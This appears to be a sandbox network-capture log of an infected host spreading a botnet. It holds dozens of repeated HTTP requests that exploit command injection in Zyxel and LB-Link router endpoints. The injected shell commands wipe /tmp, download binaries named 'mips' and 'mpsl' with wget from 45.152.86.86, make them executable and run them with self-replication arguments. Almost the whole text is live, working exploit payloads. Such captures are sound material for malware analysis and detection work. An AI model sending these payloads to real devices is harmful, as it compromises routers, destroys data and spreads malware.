                              Mar 31, 2024 08:41:36.975187063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5688192.168.2.1341856181.198.133.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975197077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5689192.168.2.1359766167.244.93.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975224018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5690192.168.2.1334646131.194.157.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975248098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5691192.168.2.1346238207.137.118.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975311995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5692192.168.2.1334884140.152.147.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975347996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5693192.168.2.1336930173.236.1.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975403070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5694192.168.2.1360048222.238.169.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975434065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5695192.168.2.1350740183.98.102.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975480080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5696192.168.2.134657051.124.214.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975506067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5697192.168.2.135240038.159.87.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975563049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5698192.168.2.134089052.107.136.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975603104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5699192.168.2.1360250184.21.49.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975646019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5700192.168.2.1357260197.15.54.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975681067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5701192.168.2.1333970150.71.45.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975712061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5702192.168.2.1333326106.180.151.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975755930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5703192.168.2.1357492218.155.137.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975785971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5704192.168.2.1348100209.115.230.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975826025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5705192.168.2.133795624.75.69.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975894928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5706192.168.2.1338622125.84.187.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975915909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5707192.168.2.1346722190.55.137.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975977898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5708192.168.2.1349140193.157.91.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975989103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5709192.168.2.13330582.120.101.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976028919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5710192.168.2.1342304100.13.197.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976070881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5711192.168.2.135905643.213.170.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976102114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5712192.168.2.1353864160.37.227.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976181030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5713192.168.2.134061241.0.166.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976203918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5714192.168.2.1340938121.174.52.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976248980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5715192.168.2.135614251.34.14.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976284981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5716192.168.2.135362275.36.224.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976330042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5717192.168.2.1333886204.146.11.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976355076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5718192.168.2.1336106126.190.255.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976411104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5719192.168.2.1339152151.158.149.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976455927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5720192.168.2.1346794213.33.190.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976509094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5721192.168.2.1350664201.191.136.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976540089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5722192.168.2.1346468154.176.91.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.976568937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5723192.168.2.1342008185.218.82.358080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.762563944 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:38.390686035 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:38.661916018 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:39.661698103 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:41.662154913 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:45.661302090 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close
                              Mar 31, 2024 08:41:53.663748026 CEST128INHTTP/1.0 302 Redirect
                              Server: PS HTTP Server
                              Location: /index.asp
                              Content-type: text/html
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              5724192.168.2.133493283.66.156.1548080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.766804934 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5725192.168.2.1349110112.48.170.48080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.972106934 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:38.402453899 CEST175INHTTP/1.1 400 Bad Request: missing required Host header
                              Content-Type: text/plain; charset=utf-8
                              Connection: close
                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 48 6f 73 74 20 68 65 61 64 65 72
                              Data Ascii: 400 Bad Request: missing required Host header


                              Session IDSource IPSource PortDestination IPDestination Port
                              5726192.168.2.134436888.70.63.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986259937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5727192.168.2.1357762166.57.43.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986305952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5728192.168.2.133767268.0.106.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986341953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5729192.168.2.1334700149.182.153.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986390114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5730192.168.2.1351306114.219.173.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986423969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5731192.168.2.1339572187.62.80.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986468077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5732192.168.2.1346398166.211.167.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986505985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5733192.168.2.1335628167.13.87.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986552954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5734192.168.2.1339936151.195.127.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986607075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5735192.168.2.13496309.228.223.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986634016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5736192.168.2.1351514166.16.209.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986713886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5737192.168.2.1343448192.180.118.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986737967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5738192.168.2.135634650.92.147.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986780882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5739192.168.2.134041080.232.163.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986814022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5740192.168.2.1355364188.214.226.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986869097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5741192.168.2.1333432209.166.107.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986907005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5742192.168.2.1339718106.57.156.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986951113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5743192.168.2.1360384124.170.105.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986962080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5744192.168.2.1337894199.136.127.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.986963034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5745192.168.2.135428239.247.172.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987000942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5746192.168.2.135254280.24.2.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987082958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5747192.168.2.1341058193.82.81.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:37.987150908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


